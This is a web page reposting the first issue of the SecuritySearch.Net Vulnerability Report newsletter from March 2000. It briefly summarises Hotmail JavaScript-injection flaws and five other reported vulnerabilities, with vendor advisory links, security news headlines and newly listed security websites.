WeberDev.com PHP and MySQL Code

LOG IN
BEGINNER GUIDES  |  PHP CLASSES  |  CODE SEARCH  |  ARTICLES SEARCH  |  PHP FORUMS  |  PHP MANUAL  |  PHP FUNCTIONS LIST  |  WEB SITE TEMPLATES
Start typing to search for PHP and MySQL Code Snippets and Articles Search
Submit a code Example / Snippet Submit Your Code
Search Engine Optimization Monitor SEO Monitor
Web Site UpTime Monitor UpTime Monitor
WeberDev's Monthly code contest PHP Code Contest
Your Personal Examples List My Favorite Examples
Your Personal Articles List My Favorite Articles
Edit Account Info Update Your Profile
More Weber Sites
PHP Code Search
Web Development Forums
Learn MySQL Playing Trivia
PHPBB2 Templates
Web Development Index
PHP Web Logs (BLogs)
Web Development Resources
Web Development Content
Recommended Links
PHPClasses
PHP Editor
PHP Jobs
Vision.To Design
Ajax Tutorials
PHP Programming Help
PHP/MySQL Programming
Webmaster Resources
Webmaster Forum
XML meta language
website builder
Recommended
Submit Site
Forex Trading Online forex trading platform

Go Back Add a Comment Send this Article to a friend Add this Article to your personal favoritest for easy future access to your favorite Code Examples and Articles. Submit a code example Print this code example.
BACK ADD A COMMENT SEND TO A FRIEND ADD TO MY FAVORITES SUBMIT AN ARTICLE PRINT
PHP MySQL Articles Submit your own Web Development Articles Latest Web Development PHP MySQL Articles RSS Feed
Title : First issue of the SecuritySearch.Net Vulnerabilit
Categories : Security, Vulnerability Report
Report SecuritySearch.Net Vulnerability
Report SecuritySearch.Net Vulnerability
Date : 2000-03-10
Grade : 0 of 5 (graded 0 times)
Viewed : 3313
Search : More Articles by Report SecuritySearch.Net Vulnerability
Action : Grade This Article
Tools : My Favotite Articles

Article

  Submit your own code examples 
 


Hello and welcome,

This is the first issue of the SecuritySearch.Net Vulnerability Report. In this newsletter you will find
the Vulnerability of the Week, the Top 5 Vulnerabilities reported this Week, the Top 5 Security News
stories this Week, and the Sites added to SecuritySearch.net this Week. We hope you enjoy this
newsletter. If you like it, or have any suggestions for improvement, we'd be happy to hear from you!


=================================================================
Sponsored by VeriSign - The Internet Trust Company
=================================================================

Protect your servers with 128-bit SSL encryption!

Get VeriSign's FREE guide, "Securing Your Web Site
for Business." You will learn everything you need to
know about using SSL to encrypt your e-commerce transactions
for serious online security. Click here!
http://www.verisign.com/cgi-bin/go.cgi?a=n016005670013000

=================================================================


Vulnerability Of The Week
=========================

HotMail

Multiple security flaws in Hotmail were discoverd this week. All three of the flaws allow a malicious
user to inject JavaScript code into e-mail messages. The malicious user can then read other users'
messages, send e-mail messages using another user's name and create a fake login screen where a
legitimate users password could be stolen. These vulnerabilities were discovered by Georgi Guninski:
http://www.nat.bg/~joro/


Top 5 Vulnerabilities this Week
===============================

1. Security Vulnerability in Aserver.
/opt/audio/bin/Aserver can be used to gain root access.
HP: http://us-support.external.hp.com

2. Security Bug Discovered in the userhelper program.
Local users can gain root access.
Red Hat, Inc: http://www.redhat.com/support/errata/RHSA2000001-02.html

3. Intel InBusiness E-mail Station.
Remote users can remove arbitrary files and reconfigure the e-mail station.
Rootshell: http://www.rootshell.com/archive-j457nxiqi3gq59dv/200001/estation.txt.html

4. Malformed IMAP Request.
Remote users can cause services to fail and execute arbitrary code on the server.
Microsoft: http://www.microsoft.com/security/bulletins/ms00-001faq.asp

5. Denial of Service Attack in IMail IMONITOR Server.
Remote users can cause IMail to crash with a "Invalid Memory Address".
USSR Labs: http://www.ussrback.com/labs26.html


Top 5 News Stories this Week
============================

** To read URL's that go over two lines, copy and paste the link directly into your web browser and
remove the spaces. **

Democratic National Committee patches security hole -
http://news.cnet.com/news/0-1005-200-1515654.html?tag=st.ne.1002.

Solaris hack attacks on the rise -
http://www.zdnet.com/zdnn/stories/news/0,4586,2417405,00.html?chkpt=zdhpnews01

Attacks on Encryption Code Raise Questions About Computer Vulnerability -
http://www.nytimes.com/library/tech/00/01/biztech/articles/05secu.html
(Registration required)

Intel grapples with security glitch in server -
http://news.cnet.com/news/0-1003-200-1515150.html?tag=st.ne.1002.

New year hack attacks -
http://www.australianit.com.au/common/story_page/0,2405,180269%255E04%252D01
%252D2000%255E,00.html


Sites added to SecuritySearch.net this Week
============================================

Cybernetica Information Security Research - Research in cryptography, fast
implementations, time-stamping, notarization and electronic documents.
http://www.cyber.ee/infosecurity/research/

HiSolutions - HiSolutions provides IT security consulting and professional
security audits. http://www.hisolutions.com/services/index.html

HiSolutions - HiSolutions provides award winning PKI-based encryption
software with SSL-Proxy options. Runs on Windows, Linux and Solaris.
http://www.hisolutions.com/hisecure/index.html

Time-Stamping Client - Time-stamping enables you to mark the time when your
file was in a certain state - be it a text document, video clip, picture or
just about any type of data than can be represented in binary form.
http://www.cyber.ee/tsc/

Sentient Consulting - Sentient Consulting delivers solutions for information
security management and real-time situational awareness. Our clients include
major industrial, financial, government and defence organisatons.
http://www.sentient.com.au

Dragon IDS - from Network Security Wizards. A packet based IDS that searches
for over 600 different network attacks at fully saturated 100 Mb/s speeds.
Runs on Linux, OpenBSD, FreeBSD and Solaris. All of the signatures are
completely open and writing new signatures is easy. Dragon collects complete
attack information - raw packet dumps, the response for the server under
attack and follow activity from suspicious hackers. Free demo.
http://www.network-defense.com/

HackerShield - Anti-hacker software that finds and closes the holes that
hackers use to break into servers, workstations and other network devices.
Aimed at systems and network administrators in both larger enterprises and
small/medium workgroups who need to protect their company's assets.
http://www.bindview.com/products/hackershield/index.html

SecuriTeam - Beyond Security will help you expose your security holes and
show you what the bad guys already know about your hosts and network. Use
our Automated Scanning service to perform a full security audit of your
site, and find the latest security news and tools. http://www.SecuriTeam.com

Netlexis - Secure Electronic Commerce Solutions - NetLexis secures
electronic commerce solutions for Windows PCs - authentication, access
control, encryption, policies, PKI and CA integration.
http://www.netlexis.com

Security Products Magazine - Security Products is an industry trade
publication featuring articles on industrial, personal and information
security for the security, fire and safety industries. Each online edition
includes daily industry news, employment resources, an online buyer's guide
and links to government agencies and professional organizations in the
industry. http://www.secprodonline.com


Questions
=========

This is our first Vulnerability Report and we would really appreciate your feedback. If you have any
questions or suggestions please contact us at feedback@securitysearch.net


Subscription
============
To unsubscribe from this newsletter please send an e-mail to vulnerabilityreport@securitysearch.net with
the word "unsubscribe" in the message body.

Copyright SecuritySearch.Net, 2000. All Rights Reserved.









Related Articles
Internet Explorer 6 Hacks And Holes Exposed
Categories : Security, Vulnerability Report
MySQL Access Control System - Grant Tables
Categories : Databases, MySQL, Security
Emergency Response Part 2 of 2
Categories : Other, Site Planning, Security
Understanding Modern Denial of Service
Categories : Security
SQL Injection Attacks: Are You Safe?
Categories : General SQL, Security
PHP5: Designing And Using Interfaces
Categories : PHP, Object Oriented, Interfaces, PHP Classes, Security
Ecommerce security - The developer's side
Categories : Ecommerce, Security, Site Planning
Writing Secure CGI scripts
Categories : CGI, Security
How to Develop a Simple yet Secure Password System
Categories : Authentication, Security
The Biggest Vulnerability of All, by Anna Johnson
Categories : Human Factors, Security
Securing Directories With htaccess
Categories : Apache, Security
Protecting PHP Scripts with HTTP Authorization
Categories : PHP, HTTP, Security, Authentication
Working with Permissions in PHP, Part 1
Categories : PHP, Security
Writing A Port Scanner In PHP
Categories : PHP, HTTP, Security
Exploring Session Security In PHP Web Applications
Categories : PHP, Security, Sessions, Web Applications